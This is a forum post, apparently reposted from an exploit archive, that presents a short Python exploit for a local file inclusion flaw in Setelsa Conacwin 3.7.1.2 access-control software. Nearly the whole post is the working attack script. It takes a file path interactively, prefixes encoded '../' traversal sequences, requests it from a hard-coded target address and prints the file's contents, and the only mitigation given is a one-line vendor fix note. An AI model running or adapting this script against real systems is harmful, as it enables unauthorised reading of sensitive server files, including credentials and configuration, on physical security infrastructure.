Hoşgeldin Misafir

Setelsa Conacwin 3.7.1.2 - Local File Inclusion Exploit

Asım Gürsoy

mersin
27 Mar 2020
8,833 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Setelsa Conacwin 3.7.1.2 - Local File Inclusion Exploit--


Kod:
# Exploit Title: Setelsa Conacwin 3.7.1.2 - Local File Inclusion
# Exploit Author: Bryan Rodriguez Martin AKA tr3mb0
# Vendor Homepage: http://setelsa-security.es/productos/control-de-acceso/
# Version: 3.7.1.2
# Tested on: Windows
# FIX: The recommendation from the vendor is to update to the last version.
 
import requests
import urllib.parse
import colorama
 
from colorama import Fore, Style
 
ENDPOINT = "http://10.4.8.11:8081/"
 
while True:
    cmd = input(Fore.RED + "[*] FILE >> ")
    print(Style.RESET_ALL)
 
    #cmd = urllib.parse.quote(cmd)
    ENDPOINT2 = ENDPOINT + "..%2F..%2F"  + cmd
 
    print("[*] Target >> " + ENDPOINT2)
    print(" ")
    r = requests.get(url = ENDPOINT2)
 
    extract = r.text
    print(extract)
 
#  0day.today [2020-12-03]  #